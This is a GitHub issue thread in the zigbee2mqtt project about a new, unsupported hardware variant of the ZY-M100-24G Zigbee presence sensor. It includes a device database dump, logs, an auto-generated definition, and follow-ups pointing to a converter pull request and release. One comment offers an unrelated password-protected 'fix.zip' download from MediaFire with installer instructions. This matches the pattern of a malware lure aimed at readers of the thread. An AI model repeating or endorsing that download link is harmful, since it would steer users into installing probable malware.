Koenkk/zigbee2mqtt #23745: [New device support]: New Hardware Variant of ZY-M100-24G Presence Sensor (Z2M Supported) - shows up as unsupported in Z2M

ryanrozich, 2024-08-26:
### Link

https://www.aliexpress.us/item/3256804538374968.html?spm=a2g0o.order_list.order_list_main.110.190e1802EyZCTU&gatewayAdapt=glo2usa

### Database entry

{"id":10,"type":"Router","ieeeAddr":"0xa4c13886bbbb6d43","nwkAddr":30804,"manufId":4417,"manufName":"_TZE204_ya4ft0w4","powerSource":"Mains (single phase)","modelId":"TS0601","epList":[1,242],"endpoints":{"1":{"profId":260,"epId":1,"devId":81,"inClusterList":[4,5,61184,0],"outClusterList":[25,10],"clusters":{"genBasic":{"attributes":{"65503":"��^.i��^.i��^.i","65506":56,"65508":0,"appVersion":74}}},"binds":[],"configuredReportings":[],"meta":{}},"242":{"profId":41440,"epId":242,"devId":97,"inClusterList":[],"outClusterList":[33],"clusters":{},"binds":[],"configuredReportings":[],"meta":{}}},"appVersion":74,"stackVersion":0,"hwVersion":1,"dateCode":"","zclVersion":3,"interviewCompleted":true,"meta":{},"lastSeen":1724679582933}

### Comments

I tried pairing this presence sensor:
ZY-M100-24G Presence Sensor (Z2M Supported) -

Which shows up as supported: https://www.zigbee2mqtt.io/devices/ZY-M100-24G.html

But it is showing up as unsupported:
2024-08-25 19:54:59z2m: Device '0xa4c13886bbbb6d43' with Zigbee model 'TS0601' and manufacturer name '_TZE204_ya4ft0w4' is NOT supported, please follow https://www.zigbee2mqtt.io/advanced/support-new-devices/01_support_new_devices.htmlinfo 

It was suggested in the Reddit post below that I may have discovered a new hardware variant of this supported device (see below).  

See the post for product images, Z2M logs, etc
https://www.reddit.com/r/homeassistant/comments/1f1c1r0/issue_with_zym10024g_presence_sensor_pairing/

Zigbee2MQTT Version I am running:
1.39.1 (commit: e132316)

### External definition

```shell
const definition = {
    zigbeeModel: ['TS0601'],
    model: 'TS0601',
    vendor: '_TZE204_ya4ft0w4',
    description: 'Automatically generated definition',
    extend: [],
    meta: {},
};

module.exports = definition;
```

JONTY650413, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

yuanxin32323, 2024-08-27:
i can do it

yuanxin32323, 2024-08-27:
i can do this

ryanrozich, 2024-08-27:
🙏

musapinar, 2024-08-27:
Bumping for interest.
I just received a similar item/variant, branded under the name "Loginovo".
_TZE204_ya4ft0w4 as "ZY-M100-24G" (not "ZY-M100-24GV2")
Same external definition as OP.
Thank you.

yuanxin32323, 2024-08-28:
@musapinar 
Yes, this product is from the same manufacturer and uses the same module as the v3 one. I have submitted the "PR" for this version. Using the "zigbee2mqtt edge" version, it should be visible.

https://github.com/Koenkk/zigbee-herdsman-converters/pull/7909

yuanxin32323, 2024-08-28:
https://github.com/Koenkk/zigbee-herdsman-converters/releases/tag/v20.7.0

It's OK!

musapinar, 2024-08-28:
@yuanxin32323 
Moving the slider or changing the inputs to set new values outputs an error (same message regardless of the item I am interacting with). Could it be related to your commit ?
[image]

Could you update the device image ?

Reported "presence" and "move" seem ok. Not quite sure about the "target distance" but it must be the hardware that is potatoe. "illuminance" is ok. Not sure yet about the effectiveness of the "sensitivity" settings.
Thanks.

yuanxin32323, 2024-08-28:
@musapinar 
Due to the time difference, I need to try it tomorrow.

therealchunkyd, 2024-08-29:
Also following this one :)

comdinet, 2024-08-29:
Following, got _TZE204_ya4ft0w4 unsupported

pavaroto, 2024-08-30:
Just received mine today, same as OP's. Following

jesse-kaufman, 2024-09-05:
The “some” error is fixed in the dev branch

ell8935, 2024-09-05:
Same as OP, following

drupry, 2024-09-29:
Can we add `.withUnit('m')` to distance in exposes ? Or there is a reason why it has no unit ?

closed 2024-12-24 by github-actions[bot]